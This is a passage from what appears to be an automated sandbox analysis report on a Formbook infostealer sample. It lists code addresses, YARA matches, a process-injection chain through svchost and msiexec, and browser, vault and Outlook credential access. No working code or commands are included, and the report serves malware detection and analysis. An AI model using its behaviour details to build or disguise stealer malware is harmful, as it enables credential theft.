            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051D46703_2_051D4670
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B06803_2_051B0680
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526A6C03_2_0526A6C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051AC6E03_2_051AC6E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0527010E3_2_0527010E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0525E0763_2_0525E076
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A00A03_2_051A00A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BE3103_2_051BE310
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051722453_2_05172245
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051AAD003_2_051AAD00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B0D693_2_051B0D69
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051C2DB03_2_051C2DB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0522EC203_2_0522EC20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A0C123_2_051A0C12
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BAC203_2_051BAC20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526EC603_2_0526EC60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05266C693_2_05266C69
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0525EC4C3_2_0525EC4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051C8CDF3_2_051C8CDF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0527ACEB3_2_0527ACEB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BCF003_2_051BCF00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526EFBF3_2_0526EFBF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B6FE03_2_051B6FE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05250E6D3_2_05250E6D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051D0E503_2_051D0E50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F2E483_2_051F2E48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05260EAD3_2_05260EAD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A2EE83_2_051A2EE8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526E9A63_2_0526E9A6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051AE9A03_2_051AE9A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051DE8103_2_051DE810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052508353_2_05250835
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051968683_2_05196868
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051C68823_2_051C6882
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524C89F3_2_0524C89F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B28C03_2_051B28C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B0B103_2_051B0B10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05224BC03_2_05224BC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526CA133_2_0526CA13
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526EA5B3_2_0526EA5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05252AC03_2_05252AC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F55503_2_051F5550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052675C63_2_052675C6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F5C93_2_0526F5C9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0521D4803_2_0521D480
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052454903_2_05245490
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052516233_2_05251623
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524D62C3_2_0524D62C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0525D6463_2_0525D646
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052236EC3_2_052236EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F6F63_2_0526F6F6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0519F1133_2_0519F113
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524D1303_2_0524D130
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052791433_2_05279143
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F717A3_2_051F717A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B51C03_2_051B51C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CB1E03_2_051CB1E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E508C3_2_051E508C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BB0D03_2_051BB0D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052670F13_2_052670F1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F3303_2_0526F330
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A13803_2_051A1380
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526124C3_2_0526124C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0519D2EC3_2_0519D2EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FD273_2_0526FD27
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05263D223_2_05263D22
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05267D4C3_2_05267D4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B9DD03_2_051B9DD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524FDF43_2_0524FDF4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B3C603_2_051B3C60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05249C983_2_05249C98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05237CE83_2_05237CE8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CFCE03_2_051CFCE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FF633_2_0526FF63
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0522FF403_2_0522FF40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05253FA03_2_05253FA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05261FC63_2_05261FC6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B1EB23_2_051B1EB2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05269ED23_2_05269ED2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F59C03_2_051F59C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051799E83_2_051799E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B38003_2_051B3800
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052258703_2_05225870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F8723_2_0526F872
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B98703_2_051B9870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CB8703_2_051CB870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052298B23_2_052298B2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052678F33_2_052678F3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052618DA3_2_052618DA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051EDB193_2_051EDB19
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FB2E3_2_0526FB2E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05241B803_2_05241B80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FA893_2_0526FA89
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CFAA03_2_051CFAA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CEEFE3_2_054CEEFE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE4AD3_2_054CE4AD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CD7483_2_054CD748
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE6DC3_2_054CE6DC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE3433_2_054CE343
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE2243_2_054CE224
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CC9E33_2_054CC9E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487BE4 appears 101 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AE692 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BEF10 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475050 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B910 appears 275 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 051E5050 appears 58 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0522EF10 appears 105 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 051F7BE4 appears 111 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0519B910 appears 280 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0521E692 appears 86 times
            Source: p4rsJEIb7k.exe, 00000000.00000003.4327019782.0000000004EDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs p4rsJEIb7k.exe
            Source: p4rsJEIb7k.exe, 00000000.00000003.4319939147.0000000004D33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs p4rsJEIb7k.exe
            Source: p4rsJEIb7k.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0043614F FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeFile created: C:\Users\user\AppData\Local\Temp\gobioidJump to behavior
            Source: p4rsJEIb7k.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, 00000003.00000003.4995883349.0000000008230000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8172567571.0000000008239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
            Source: msiexec.exe, 00000003.00000003.4994416168.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989398688.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989236920.0000000003352000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4992897675.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.0000000003372000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: msiexec.exe, 00000003.00000003.4999748750.0000000008293000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8172567571.000000000829F000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: p4rsJEIb7k.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeFile read: C:\Users\user\Desktop\p4rsJEIb7k.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\p4rsJEIb7k.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"Jump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: p4rsJEIb7k.exeStatic file information: File size 1335565 > 1048576
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BlltrVxNMs.exe, 00000002.00000000.4736161942.0000000000ABE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
